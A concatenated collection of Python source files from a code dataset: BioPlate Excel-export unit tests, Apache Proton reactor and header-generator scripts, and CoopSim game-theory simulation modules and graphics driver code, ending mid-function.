self.PTE, "data", self.stack, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data_stack(self.stack)
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateStack_bp_row(self):
c = {"order": "R"}
read_excel = as_read_excel(
self.PTE, "data", self.stack, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data_stack(self.stack, order="R")
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateStack_bp_row_acc(self):
c = {"order": "R", "accumulate": False}
read_excel = as_read_excel(
self.PTE, "data", self.stack, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data_stack(self.stack, order="R", accumulate=False)
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateStack_bpi(self):
c = None
read_excel = as_read_excel(
self.PTE, "data", self.stacki, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data_stack(self.stacki)
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateStack_bpi_row(self):
c = {"order": "R"}
read_excel = as_read_excel(
self.PTE, "data", self.stacki, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data_stack(self.stacki, order="R")
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateStack_bpi_row_acc(self):
c = {"order": "R", "accumulate": False}
read_excel = as_read_excel(
self.PTE, "data", self.stacki, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data_stack(self.stacki, order="R", accumulate=False)
self.assertEqual(read_excel, rm_empty)
###TEST COUNT SHEET
def test_count_BioPlate(self):
c = None
read_excel = as_read_excel(
self.PTE, "count", self.plt, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.plt)
self.assertEqual(read_excel, rm_empty)
def test_count_BioPlate_emp(self):
c = {"empty": "vide"}
read_excel = as_read_excel(
self.PTE, "count", self.plt, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.plt, empty="vide")
self.assertEqual(read_excel, rm_empty)
def test_count_BioPlateInserts(self):
c = None
read_excel = as_read_excel(
self.PTE, "count", self.Inserts, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.Inserts, Inserts=True)
self.assertEqual(read_excel, rm_empty)
def test_count_BioPlateInserts(self):
c = {"empty": "vide"}
read_excel = as_read_excel(
self.PTE, "count", self.Inserts, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.Inserts, empty="vide", Inserts=True)
self.assertEqual(read_excel, rm_empty)
def test_count_BioPlateStack_bp(self):
c = None
read_excel = as_read_excel(
self.PTE, "count", self.stack, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.stack)
self.assertEqual(read_excel, rm_empty)
def test_count_BioPlateStack_bp_em(self):
c = {"empty": "vide"}
read_excel = as_read_excel(
self.PTE, "count", self.stack, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.stack, empty="vide")
self.assertEqual(read_excel, rm_empty)
def test_count_BioPlateStack_bpi(self):
c = None
read_excel = as_read_excel(
self.PTE, "count", self.stacki, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.stacki, Inserts=True)
self.assertEqual(read_excel, rm_empty)
def test_count_BioPlateStack_bpi_em(self):
c = {"empty": "vide"}
read_excel = as_read_excel(
self.PTE, "count", self.stacki, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.stacki, empty="vide", Inserts=True)
self.assertEqual(read_excel, rm_empty)
def test_error_init(self):
with self.assertRaises(ValueError):
BioPlateToExcel("test.xlsx", sheets = ["bob",], test=True)
with self.assertRaises(Exception):
BioPlateToExcel("test.xlsx", sheets = "bob")
def test_in_memory(self):
t = BioPlateToExcel("test.xlsx", test=True)
self.assertEqual(t.get_test(), b'')
x = BioPlateToExcel("test.xlsx")
self.assertEqual(x.get_test(), None)
if __name__ == "__main__":
unittest.main()
```
|
{
"source": "jeckersb/Proton",
"score": 4
}
|
#### File: python/reactor/count-randomly.py
```python
import time, random
from proton.reactor import Reactor
# Let's try to modify our counter example. In addition to counting to
# 10 in quarter second intervals, let's also print out a random number
# every half second. This is not a super easy thing to express in a
# purely sequential program, but not so difficult using events.
class Counter:
def __init__(self, limit):
self.limit = limit
self.count = 0
def on_timer_task(self, event):
self.count += 1
print self.count
if not self.done():
event.reactor.schedule(0.25, self)
# add a public API to check for doneness
def done(self):
return self.count >= self.limit
class Program:
def on_reactor_init(self, event):
self.start = time.time()
print "Hello, World!"
# Save the counter instance in an attribute so we can refer to
# it later.
self.counter = Counter(10)
event.reactor.schedule(0.25, self.counter)
# Now schedule another event with a different handler. Note
# that the timer tasks go to separate handlers, and they don't
# interfere with each other.
event.reactor.schedule(0.5, self)
def on_timer_task(self, event):
# keep on shouting until we are done counting
print "Yay, %s!" % random.randint(10, 100)
if not self.counter.done():
event.reactor.schedule(0.5, self)
def on_reactor_final(self, event):
print "Goodbye, World! (after %s long seconds)" % (time.time() - self.start)
# In hello-world.py we said the reactor exits when there are no more
# events to process. While this is true, it's not actually complete.
# The reactor exits when there are no more events to process and no
# possibility of future events arising. For that reason the reactor
# will keep running until there are no more scheduled events and then
# exit.
r = Reactor(Program())
r.run()
```
#### File: proton-c/src/protocol.h.py
```python
from protocol import *
print "/* generated */"
print "#ifndef _PROTON_PROTOCOL_H"
print "#define _PROTON_PROTOCOL_H 1"
print
print "#include \"proton/type_compat.h\""
fields = {}
for type in TYPES:
fidx = 0
for f in type.query["field"]:
print "#define %s_%s (%s)" % (field_kw(type), field_kw(f), fidx)
fidx += 1
idx = 0
for type in TYPES:
desc = type["descriptor"]
name = type["@name"].upper().replace("-", "_")
print "#define %s_SYM (\"%s\")" % (name, desc["@name"])
hi, lo = [int(x, 0) for x in desc["@code"].split(":")]
code = (hi << 32) + lo
print "#define %s ((uint64_t) %s)" % (name, code)
fields[code] = (type["@name"], [f["@name"] for f in type.query["field"]])
idx += 1
print """
#include <stddef.h>
typedef struct {
const unsigned char name_index;
const unsigned char first_field_index;
const unsigned char field_count;
} pn_fields_t;
extern const pn_fields_t FIELDS[];
extern const char * const FIELD_STRINGPOOL;
extern const uint16_t FIELD_NAME[];
extern const uint16_t FIELD_FIELDS[];
extern const unsigned char FIELD_MIN;
extern const unsigned char FIELD_MAX;
"""
print "#ifdef DEFINE_FIELDS"
print 'struct FIELD_STRINGS {'
print ' const char FIELD_STRINGS_NULL[sizeof("")];'
strings = set()
for name, fnames in fields.values():
strings.add(name)
strings.update(fnames)
for str in strings:
istr = str.replace("-", "_");
print ' const char FIELD_STRINGS_%s[sizeof("%s")];' % (istr, str)
print "};"
print
print 'const struct FIELD_STRINGS FIELD_STRINGS = {'
print ' "",'
for str in strings:
print ' "%s",'% str
print "};"
print 'const char * const FIELD_STRINGPOOL = (const char * const) &FIELD_STRINGS;'
print
print "/* This is an array of offsets into FIELD_STRINGPOOL */"
print "const uint16_t FIELD_NAME[] = {"
print " offsetof(struct FIELD_STRINGS, FIELD_STRINGS_NULL),"
index = 1
for i in range(256):
if i in fields:
name, fnames = fields[i]
iname = name.replace("-", "_");
print ' offsetof(struct FIELD_STRINGS, FIELD_STRINGS_%s), /* %d */' % (iname, index)
index += 1
print "};"
print "/* This is an array of offsets into FIELD_STRINGPOOL */"
print "const uint16_t FIELD_FIELDS[] = {"
print " offsetof(struct FIELD_STRINGS, FIELD_STRINGS_NULL),"
index = 1
for i in range(256):
if i in fields:
name, fnames = fields[i]
if fnames:
for f in fnames:
ifname = f.replace("-", "_");
print ' offsetof(struct FIELD_STRINGS, FIELD_STRINGS_%s), /* %d (%s) */' % (ifname, index, name)
index += 1
print "};"
print "const pn_fields_t FIELDS[] = {"
name_count = 1
field_count = 1
field_min = 256
field_max = 0
for i in range(256):
if i in fields:
if i>field_max: field_max = i
if i<field_min: field_min = i
for i in range(field_min, field_max+1):
if i in fields:
name, fnames = fields[i]
if fnames:
print ' {%d, %d, %d}, /* %d (%s) */' % (name_count, field_count, len(fnames), i, name)
field_count += len(fnames)
else:
print ' {%d, 0, 0}, /* %d (%s) */' % (name_count, i, name)
name_count += 1
if i>field_max: field_max = i
if i<field_min: field_min = i
else:
print ' {0, 0, 0}, /* %d */' % i
print "};"
print
print 'const unsigned char FIELD_MIN = %d;' % field_min
print 'const unsigned char FIELD_MAX = %d;' % field_max
print
print "#endif"
print
print "#endif /* protocol.h */"
```
|
{
"source": "jecki/CoopSim",
"score": 3
}
|
#### File: jecki/CoopSim/Customized.py
```python
## Modules Simulation and Strategies must be imported here in order to
## define user strategies and/or custom simulation setups.
from Simulation import *
from Strategies import *
from PyPlotter import Simplex
from Bayreuth import *
### The following flags from CoopSim can be overridden here:
##
DISABLE_USER_STRATEGIES = False # don't allow user defined strategies
SIMPLEX_FLAVOR = Simplex.VECTORS # alternative: Simplex.TRAJECTORIES
## Here is an example for a user strategy.
## Don't forget to instantiate any user defined classes !!!
# class LesserTFT(Strategy):
# "Retailiate only when not having retailiated in the last round already."
# def firstMove(self):
# return 1 # start friendly
# def nextMove(self, myMoves, opMoves):
# if opMoves[-1] == 0 and myMoves[-1] != 0:
# return 0 # retailiate
# else:
# return 1 # cooperate
# lesser_tft = LesserTFT()
## If your strategy uses random numbers, be shure to set the member
## variable 'randomizing' to true to indicate the use of random
## numbers, so that several samples of each match against this
## strategy are taken. The constructor of your class strategy class
## that uses random numbers could look like this:
##
## class RandomizingStrategy(Strategy):
## def __init__(self):
## Strategy.__init__(self) # call the constructor of the parent class
## self.randomizing = True # indicate use of random numbers
##
## ...
##
## To define a custom setup, you have will have to instantiate the SimSetup
## class and possibly also the Degenerator class (if you want to artificially
## induce an evolutionary drift for example). The constructor of the SimSetup
## class takes the following keyword parameters:
##
## name = string: name of the model
## strategyList = list of Strategy objects: the list of the strategies
## population = tuple: population share for each strategy
## correlation = float [0.0-1.0]: correlation factor
## gameNoise = float [0.0-1.0]: in game noise
## noise = float [0.0-1.0]: evolutionary background noise
## iterations = int: number of iterations for one match
## samples = int: number of sample matches to take (only useful for
## randomizing strategies)
## payoff = tuple of floats: payoff tuple (T, R, P, S)
## mutators = list of Motator objects: description of possible
## mutation (or rather degeneration) of strategies during
## the course of the evolutionary development.
##
## The class Mutator is instantiated with the following parameters:
##
## original = int: the ordinal number of the strategy that is going
## to mutate
## mutated = int: the ordinal number of the startegy that 'original' is
## going to mutate into
## rate = float [0.0 - 1.0]: mutation rate
##
## Here is an example simulation setup using mutators:
# custom_setup = SimSetup(name = "Grim => Dove, Tester",
# strategyList = [Grim(), Dove(), Tester()],
# population = (0.8, 0.01, 0.19),
# mutators = [Mutator(0, 1, 0.01)])
def main(simwindow):
"""Customized.main will be calld right after initializing the
CoopSim main application window. (Use with care!!!)"""
pass
def filterStrategies(sl):
"""Filters the set of available strategies."""
return sl
def filterModels(md):
"""Filters the set of available modles."""
return md
##def filterStrategies(sl):
## """Only two state automata strategies."""
## # example: only two state automata and user defined strategies!
## fl = [s for s in sl if sl.__class__.__module__ == "UserStratgies" \
## and not sl.__class__ == TwoStateAutomaton]
## fl.extend(genAllAutomata())
## return fl
##
##def filterModels(md):
## """Only one model with all two state automata."""
## for k in md:
## if md[k].__class__.__module__ != "UserStrategies": del md[k]
## am = SimSetup("All Automata", genAllAutomata())
## am._userDefined = False
## md[am.name] = am
## return md
#automata = genAllAutomata()
#endGameCheaters = genEndGameCheaters(0, 10)
#
#automata_setup = SimSetup(name = "01 Automata",
# strategyList = automata)
#
#endgamecheaters_setup = SimSetup(name = "02 Endgame Cheaters",
# strategyList = endGameCheaters)
#
#noisycheaters_setup = SimSetup(name = "03 Noisy Endgame Cheaters",
# strategyList = endGameCheaters,
# gameNoise = 0.01)
#
#stability1 = SimSetup(name = "04 Grim, Tester",
# strategyList = [Grim(), Tester()],
# population = (0.8, 0.2))
#
#stability2 = SimSetup(name = "05 Grim => Dove, Tester => Dove",
# strategyList = [Grim(), Dove(), Tester()],
# population = (0.795, 0.01, 0.195),
# mutators = [Mutator(0, 1, 0.01), Mutator(2, 1, 0.01)])
#
#slipstream = SimSetup(name = "06 Slip Stream Altruism",
# strategyList = [TitForTat(), TatForTit(), Dove(), Hawk()],
# payoff = (5.0, 4.0, 1.0, 0.0))
#
#bayreuth = SimSetup(name = "07 Bayreuth Strategies",
# strategyList = [BayAnikaDoerge(), BayChristophSiemroth(),
# BayBernhardHannenheim2(), BayStefanFrisch(),
# BayJuliaLohmann(), BayPhilippSchaechtele2(),
# BayAugmentedTFT(), BayJohannesWerner(),
# BayMartinSchymalla(), BaySteffenHahn()])
#
#group_selection = SimSetup(name = "08 Group Selection RS 5",
# strategyList = [Dove(), Hawk()],
# payoff = (5.0, 4.0, 1.0, 0.0),
# demes = DemeDescriptor(num = 25,
# minSize = 2,
# maxSize = 2,
# reshapeInterval = 5))
#
#group_selection3 = SimSetup(name = "09 Group Selection RS 10",
# strategyList = [Dove(), Hawk()],
# payoff = (5.0, 4.0, 1.0, 0.0),
# demes = DemeDescriptor(num = 25,
# minSize = 2,
# maxSize = 2,
# reshapeInterval = 10))
#
#group_selection4 = SimSetup(name = "10 Group Selection More Strategies",
# strategyList = [Dove(), Grim(), SignalingCheater(), TitForTat()],
# payoff = (5.9, 3.0, 1.0, 0.0),
# demes = DemeDescriptor(num = 10,
# minSize = 1,
# maxSize = 3,
# reshapeInterval = 10))
```
#### File: jecki/CoopSim/GroupSelection_test.py
```python
import gtk
from gtk import gdk
from PyPlotter import gtkGfx, gtkSupport, psGfx
import GroupSelection
from GroupSelection import *
########################################################################
#
# Strategy sets
#
########################################################################
strategy_mix = (Tester(), TitForTat(), Pavlov(), Grim(), Random(),
Hawk(), Tranquillizer(), Dove(), Joss())
automata = tuple(genAllAutomata())
TFTs = tuple(genParameterizedTFTs(0.0, 1.0, 0.2, 0.0, 1.0, 0.2))
dove_hawk = (Dove(), Hawk())
########################################################################
#
# Simulation class
#
########################################################################
class GroupSimulation(object):
def __init__(self, strategies, N, minSize, maxSize, reshapeInterval=10):
self.reshapeInterval = reshapeInterval
self.strategies = strategies
self.N = N; self.minSize = minSize; self.maxSize = maxSize
superdeme = PDDeme(self.strategies).spawn(N, minSize, maxSize)
superdeme.name = "Aggregation"
# groupdeme = PDDeme(self.strategies).spawn(N, minSize, maxSize)
groupdeme = copy.deepcopy(superdeme)
groupdeme.name = "Group Selection"
self.worlds = [None]*3; self.views = [None]*4
self.worlds[1] = superdeme
self.worlds[0] = self.worlds[1].aggregate()
self.worlds[0].name = "No Demes"
self.worlds[2] = groupdeme
self.views[0] = DemeView(self.worlds[0], Gfx.nilDriver(),
"No Demes")
self.views[1] = DemeView(self.worlds[1], Gfx.nilDriver(),
"Simple Aggregation", weighted = False)
self.views[2] = DemeView(self.worlds[1], Gfx.nilDriver(),
"Weighted Aggregation", weighted = True)
self.views[3] = DemeView(self.worlds[2], Gfx.nilDriver(),
"Group Selection", weighted = True)
self.win = gtkSupport.NotebookWindow([v.title for v in self.views],
(800,600),
"Cooperation & Group Selection")
for v in self.views: self.win.addRedrawHook(v.title, v.redraw)
for cv in self.win.pages.values():
cv.canvas.connect("button-press-event", self.onMouseButton)
cv.canvas.set_events(gdk.EXPOSURE_MASK|gdk.BUTTON_PRESS_MASK)
self.win.show()
def evolution(self, generations=100):
for i in xrange(generations):
if i > 0 and i % self.reshapeInterval == 0:
self.worlds[2].reshape(self.N, self.minSize, self.maxSize)
for k in xrange(len(self.worlds)): self.worlds[k].replicate()
for k in xrange(len(self.views)): self.views[k].update()
def onMouseButton(self, widget, event):
if event.button == 2 or event.button == 3:
dialog = gtk.FileChooserDialog(action = gtk.FILE_CHOOSER_ACTION_SAVE,
buttons = ("Save", gtk.RESPONSE_OK,
"Cancel", gtk.RESPONSE_CANCEL))
fltr = gtk.FileFilter()
fltr.add_pattern("*.eps")
fltr.set_name("EPS-Grafik")
dialog.add_filter(fltr)
if dialog.run() == gtk.RESPONSE_OK:
fname = dialog.get_filename()
if not fname.endswith(".eps"): fname += ".eps"
label = self.win.get_currentPage()
for view in self.views:
if view.title == label: break
else: raise AssertionError, "No page with label %s"%label
ps = psGfx.Driver()
view.redraw(ps)
ps.save(fname)
dialog.hide()
dialog.destroy()
## dialog = gtk.FileChooserDialog(action = gtk.FILE_CHOOSER_ACTION_SAVE,
## buttons = ("Save", gtk.RESPONSE_OK,
## "Cancel", gtk.RESPONSE_CANCEL))
## fltr = gtk.FileFilter()
## fltr.add_pattern("*.png")
## fltr.set_name("PNG-Grafik")
## dialog.add_filter(fltr)
## if dialog.run() == gtk.RESPONSE_OK:
## fname = dialog.get_filename()
## if not fname.endswith(".png"): fname += ".png"
## self.win.savePage(name = fname)
## dialog.hide()
## dialog.destroy()
########################################################################
#
# Test
#
########################################################################
def printRankings(sim):
for rank, name, share in sim.worlds[0].aggregate().ranking():
print "%2i. %s %1.5f"%(rank, name.ljust(40), share)
print "\n"+"-"*40+"\n"
for rank, name, share in sim.worlds[1].aggregate(False).ranking():
print "%2i. %s %1.5f"%(rank, name.ljust(40), share)
print "\n"+"-"*40+"\n"
for rank, name, share in sim.worlds[1].aggregate(True).ranking():
print "%2i. %s %1.5f"%(rank, name.ljust(40), share)
print "\n"+"-"*40+"\n"
for rank, name, share in sim.worlds[2].aggregate(True).ranking():
print "%2i. %s %1.5f"%(rank, name.ljust(40), share)
def Test1():
sim = GroupSimulation(automata, 100, 3, 7)
sim.evolution()
printRankings(sim)
sim.win.waitUntilClosed()
def Test2():
sim = GroupSimulation(dove_hawk, 25, 1, 2)
sim.evolution()
sim.win.waitUntilClosed()
def Test3():
sim = GroupSimulation(dove_hawk, 25, 2, 2)
sim.evolution(200)
sim.win.waitUntilClosed()
def Test4():
sim = GroupSimulation(strategy_mix, 100, 3,7)
sim.evolution()
printRankings(sim)
sim.win.waitUntilClosed()
def Test5():
sim = GroupSimulation(TFTs, 100, 3, 7)
sim.evolution()
printRankings(sim)
sim.win.waitUntilClosed()
def Test6():
sim = GroupSimulation((Tester(), Dove()), 25, 2, 2)
sim.evolution()
sim.win.waitUntilClosed()
def Test7():
GroupSelection.PD_PAYOFF = array([[[1.0, 1.0], [5.9, 0.0]],\
[[0.0, 5.9], [3.0, 3.0]]])
sim = GroupSimulation((SignallingCheater(), Dove(), Grim(), TitForTat()), 10, 1, 3)
sim.evolution(300)
sim.win.waitUntilClosed()
def Test8():
GroupSelection.PD_PAYOFF = array([[[1.0, 1.0], [5.9, 0.0]],\
[[0.0, 5.9], [3.0, 3.0]]])
sim = GroupSimulation((SignallingCheater(), Dove(), Grim(), TitForTat()), 10, 2, 3)
sim.evolution(300)
sim.win.waitUntilClosed()
if __name__ == "__main__":
# Test1()
# Test2()
Test3()
# Test4()
# Test5()
# Test6()
Test7()
# Test8()
```
#### File: CoopSim/PopulationDynamics/ArrayWrapper.py
```python
import copy, random
from Compatibility import *
class array(object):
"""Wraps a function or a nested list or tuple as a multidimensional array
Access to a cell of an ArrayWrapper object, e.g. "aw[a,b,c]" will be
mapped to a function call "f(a,b,c)" or to a nested sequence "l[a][b][c]"
respectively.
The ArrayWrapper class is syntactical sugar to provide similar access to
pay functions or lists as to Numeric or nummarray arrays.
Warning: This wrapper does not do much error checking! Some methods
do not work for wrapped functions!
"""
def __str__(self):
if self.obj != None: return str(self.obj)
else: return "Cannot convert wrapped function to string!"
def __len__(self):
assert self.obj != None, "Length of wrapped function is not defined!"
return len(self.obj)
def __init__(self, obj, *etc):
"""obj - function or tuple of list
"""
if callable(obj):
self.obj = None
self.dimensions = None
self.function = obj
elif hasattr(obj, "__getitem__"):
self.obj = list(obj)
self.dimensions = []
l = self.obj
while type(l) == type([]):
self.dimensions.append(len(l))
assert l != [], "Empty lists or lists with empty lists "+\
"as elements cannot be wrapped!"
## for i in xrange(len(l)):
## if isinstance(l[i], array): l[i] = list(l[i])
l = l[0]
self.function = self.__listwrapper
else:
raise TypeError, "ArrayWrapper only supports callables, lists "+\
"or tuples, but not %s!" % type(obj)
self.__op = None
def __listwrapper(self, *key):
value = self.obj
for i in key: value = value[i]
return value
def __getitem__(self, key):
if type(key) == type(1): return self.function(key)
else: return self.function(*key)
def __setitem__(self, key, value):
if self.obj != None:
if type(key) == type(1):
self.obj[key] = value
else:
ref = self.obj
for i in key[:-1]: ref = ref[i]
ref[key[-1]] = value
else:
raise TypeError,"wrapped functions do not support item assignement"
def __getstate__(self):
if self.function != self.__listwrapper:
raise TypeError, "Can't prepare an Array Wrapper "\
"of a function for pickling!"
else:
dct = self.__dict__.copy()
dct["function"] = None
return dct
def __setstate__(self, dict):
self.__dict__.update(dict)
self.function = self.__listwrapper
def __operation(self, l1, l2):
if type(l1) == type([]):
if type(l2) == type([]):
return [self.__operation(x1,x2) for (x1,x2) in zip(l1,l2)]
else:
return [self.__operation(x,l2) for x in l1]
else: return self.__op(l1,l2)
def __arithmetic(self, other, op):
self.__op = op
if isinstance(other, array):
assert self.dimensions != None and other.dimensions != None,\
"Cannot multiply wrapped functions!"
assert self.dimensions == other.dimensions, \
"Cannot multiply arrays with different dimensions: %s and %s"\
% (str(self.dimensions),str(other.dimensions))
return array(self.__operation(self.obj, other.obj))
else: return array(self.__operation(self.obj, other))
def __mul__(self, other):
"""Multiply array item for item with another array of the same
dimensions or with a scalar. This is not a matrix multiplication.
For matrix multiplication use function 'matrixmultiply' or
'dot' instead.
"""
return self.__arithmetic(other, lambda x,y:x*y)
def __add__(self, other):
"""Add array item for item with another array of the same
dimensions or add a scalar to every element of the array.
"""
return self.__arithmetic(other, lambda x,y:x+y)
def __div__(self, other):
"""Divide an array elementwise by a scalar or by the elements
of another array.
"""
return self.__arithmetic(other, lambda x,y:x/y)
__truediv__ = __div__
def __eq__(self, other):
"""Elementwise test for equality."""
if other == None: return False
return self.__arithmetic(other, lambda x,y:x==y)
def __ne__(self, other):
"""Elementwise test for equality."""
if other == None: return True
return self.__arithmetic(other, lambda x,y:x!=y)
def tolist(self):
"""Returns the object as list. Not possible for wrapped functions!"""
if self.obj != None:
return self.obj
else: raise TypeError, "Cannot convert wrapped function into a list!"
def copy(self):
"""Returns a copy of the array."""
return copy.deepcopy(self)
def diagonal(self):
"""Returns the diagonal of the array as array"""
assert self.dimensions != None, \
"Cannot determine the diagonal for wrapped functions!"
ds = len(self.dimensions)
if ds == 1: return self.obj[0]
return array([self.__getitem__(*((i,)*ds)) \
for i in xrange(len(self.obj))])
def asarray(seq):
"""Subsitute for Numeric.asarray."""
return array(seq)
def dot(a, b):
"""Matrix multiplication of the arrays 'a' and 'b'"""
assert a.dimensions != None and b.dimensions != None,\
"Cannot multiply wrapped functions!"
assert len(a.dimensions) <= 2 and len(b.dimensions) <= 2,\
"Sorry, implementation does not support dot product for dimensions > 2"
if len(a.dimensions) == 2:
if len(b.dimensions) == 1:
v = []
for l in range(a.dimensions[0]):
s = sum([a[l,c] * b[c] for c in range(a.dimensions[1])])
v.append(s)
return array(v)
elif len(a.dimensions) == 1:
if len(b.dimensions) == 1:
return sum([a[c]*b[c] for c in range(a.dimensions[0])])
assert False, "Sorry, matrix multiplication not yet implemented for "+\
"dimensions %i, %i"%(len(a.dimensions),len(b.dimensions))
matrixmultiply = dot
def flatten(l):
"""Flatten a nested list to a one dimensional list."""
r = []
for item in l:
if isinstance(item, list) or isinstance(item, tuple):
r.extend(flatten(item))
else: r.append(item)
return r
def ravel(array):
"""Rough replacement for Numeric.ravel!"""
assert array.obj != None, "Cannot reshape function arrays!"
return flatten(array.obj)
def concatenate(a, axis=0):
"""Rough replacement for Numeric.concatenate! Works only for 1-dimensional
array. The axis parameter is ignoered!"""
l = []
for aw in a: l.extend(aw.obj)
return array(l)
def diagonal(a, *parms):
"""Rough replacement for Numeric.diagonal."""
return a.diagonal()
def _zeros(shape):
"""Returns a list filled with zeros (floating point numbers)."""
if len(shape) == 0: return 0.0
else:
l = [_zeros(shape[:-1]) for i in xrange(shape[-1])]
return l
def zeros(shape, typeString="d"):
"""Returns an array filled with 0.0"""
return array(_zeros(shape))
def any(a):
"""--> true, if any of the elements of array 'a' are true."""
for e in flatten(a.obj):
if e: return True
return False
def all(a):
"""--> true, if all elements of array 'a' are true."""
for e in flatten(a.obj):
if e: return True
return False
##def uniform(minimum, maximum, shape=[]):
## """Rough replacement for RandomArray.uniform."""
## if len(shape) == 0: return random.uniform(minimum, maximum)
## assert len(shape) <= 1, "Multidimensional random arrays not yet supported!"
## return array([random.uniform(minumum, maximum) for i in range(shape[0])])
```
#### File: CoopSim/PopulationDynamics/Example2.py
```python
try:
from PyPlotter import awtGfx as GfxDriver
except ImportError:
from PyPlotter import wxGfx as GfxDriver
from PyPlotter import Simplex
import Dynamics
from Compatibility import array
payoff_table = array([[1./3, 1./3, 1./3],
[2./3, 0., 0.],
[1./2, 0., 1./2]])
def DemandGame():
"""A population dynamical simulation of the demand game,
demonstrating the use of simplex diagrams.
"""
# Open a window for graphics output.
gfx = GfxDriver.Window(title="Demand Game")
# Generate the appropriate dynamical function from the payoff table.
dynamicsFunction = Dynamics.GenDynamicsFunction(payoff_table, e=0.0)
# Set up a simplex diagram of patches with a density of 51.
diagram = Simplex.Diagram(gfx, dynamicsFunction, "Demand Game",
"Demand 1/3", "Demand 2/3", "Demand 1/2",
styleFlags = Simplex.PATCHES, density = 51)
# Calculate 20 generations and show the updated colours of the
# patches after each generation.
diagram.show(0)
gfx.refresh()
for i in range(20):
diagram.show(1)
gfx.refresh()
# Finally, make the candidates for fixed points visible.
diagram.showFixedPoints((1.0, 0.5, 0.0))
gfx.refresh()
# Wait until the application window is closed by the user.
gfx.waitUntilClosed()
if __name__ == "__main__":
print __doc__
DemandGame()
```
#### File: CoopSim/PopulationDynamics/Example5.py
```python
import random
try:
from PyPlotter import awtGfx as GfxDriver
except ImportError:
from PyPlotter import wxGfx as GfxDriver
from PyPlotter import Graph, Gfx
import Dynamics
from Compatibility import array
## Definition of the currency game
def CurrencyGame(distribution, epsilon=0.5, gamma=0.5):
"""Determines the number of players that will use gold or
silver as currency in the next round."""
N = distribution["gold"] + distribution["silver"]
i = random.randint(1, N)
if i <= distribution["gold"]:
s = "gold"
distribution["gold"] -= 1
else:
s = "silver"
distribution["silver"] -= 1
p = distribution["gold"] / float(N)
x = random.random()
if x >= epsilon:
if p > gamma: distribution["gold"] += 1
elif p < gamma: distribution["silver"] += 1
else: distribution[s] += 1
else:
if random.random() >= 0.5: distribution["gold"] += 1
else: distribution["silver"] += 1
return distribution
def RunCurrencyGame():
"""A simulation of the 'currency game'."""
# Open a window for graphics output.
gfx = GfxDriver.Window(title = "Sender - Receiver Game")
# Set the graph for plotting the plotting dynamics.
graph = Graph.Cartesian(gfx, 0., 0., 500., 10.,
"Currency Game", "rounds", "gold currency")
graph.addPen("gold currency", Gfx.RED_PEN)
distribution = {"gold": 5, "silver": 5}
graph.addValue("gold currency", 0, distribution["gold"])
# Play the currency game for 2500 rounds and plot the results.
for g in range(1, 2501):
distribution = CurrencyGame(distribution)
graph.addValue("gold currency", g, distribution["gold"])
if g % 100 == 0: gfx.refresh()
## Wait until the user closes the window.
gfx.waitUntilClosed()
if __name__ == "__main__":
print __doc__
RunCurrencyGame()
```
#### File: CoopSim/PyPlotter/awtGfx.py
```python
import math
import java, pawt
from java import awt, applet
import Gfx
from Compatibility import *
driverName = "awtGfx"
########################################################################
#
# class Driver
#
########################################################################
white = java.awt.Color.WHITE
black = java.awt.Color.BLACK
class Driver(Gfx.Driver):
"""A simple graphics layer on top of teh java awt.
See GfxInterface.py
"""
def __init__(self, awtObject):
"""Initialize canvas on an awt component or image.
"""
Gfx.Driver.__init__(self)
self.stroke_width = 1.0
self.stroke_dash = [1.0]
self.stroke = None
self.paint = None
self.w, self.h = 640, 480
self.fsize = 12
self.awtObject = None
self.graphics = None
self.pattern = awt.image.BufferedImage(16, 16, awt.image.BufferedImage.TYPE_INT_RGB)
self.changeGfx(awtObject)
self.setAntialias(True)
def setAntialias(self, onOff):
if onOff:
rh = awt.RenderingHints(awt.RenderingHints.KEY_ANTIALIASING,
awt.RenderingHints.VALUE_ANTIALIAS_ON)
rh.put(awt.RenderingHints.KEY_TEXT_ANTIALIASING,
awt.RenderingHints.VALUE_TEXT_ANTIALIAS_ON)
else:
rh = awt.RenderingHints(awt.RenderingHints.KEY_ANTIALIASING,
awt.RenderingHints.VALUE_ANTIALIAS_OFF)
rh.put(awt.RenderingHints.KEY_TEXT_ANTIALIASING,
awt.RenderingHints.VALUE_TEXT_ANTIALIAS_OFF)
self.graphics.setRenderingHints(rh)
def _updateStroke(self):
if len(self.stroke_dash) > 1:
self.stroke = awt.BasicStroke(self.stroke_width,
awt.BasicStroke.CAP_BUTT,
awt.BasicStroke.JOIN_BEVEL,
10.0, self.stroke_dash, 0.0)
else:
self.stroke = awt.BasicStroke(self.stroke_width,
awt.BasicStroke.CAP_BUTT,
awt.BasicStroke.JOIN_BEVEL,
10.0)
self.graphics.setStroke(self.stroke)
def _updatePaint(self):
awtColor = awt.Color(self.color[0], self.color[1], self.color[2])
if self.fillPattern == Gfx.SOLID:
self.graphics.setColor(awtColor)
self.graphics.setPaint(awtColor)
self.paint = awtColor
return
gr = self.pattern.createGraphics()
gr.setColor(awt.Color(255,255,255)) # quick hack: should be transparent
gr.fillRect(0,0,16,16)
gr.setColor(awtColor)
if self.fillPattern == Gfx.PATTERN_A:
for x in range(0,16,4):
gr.drawLine(x, 0, x+16, 16)
gr.drawLine(x+1, 0, x+17, 16)
gr.drawLine(x-16, 0, x, 16)
gr.drawLine(x-15, 0, x+1, 16)
elif self.fillPattern == Gfx.PATTERN_B:
for x in range(0,16,4):
gr.drawLine(x, 0, x-16, 16)
gr.drawLine(x+1, 0, x-15, 16)
gr.drawLine(x+16, 0, x, 16)
gr.drawLine(x+17, 0, x+1, 16)
elif self.fillPattern == Gfx.PATTERN_C:
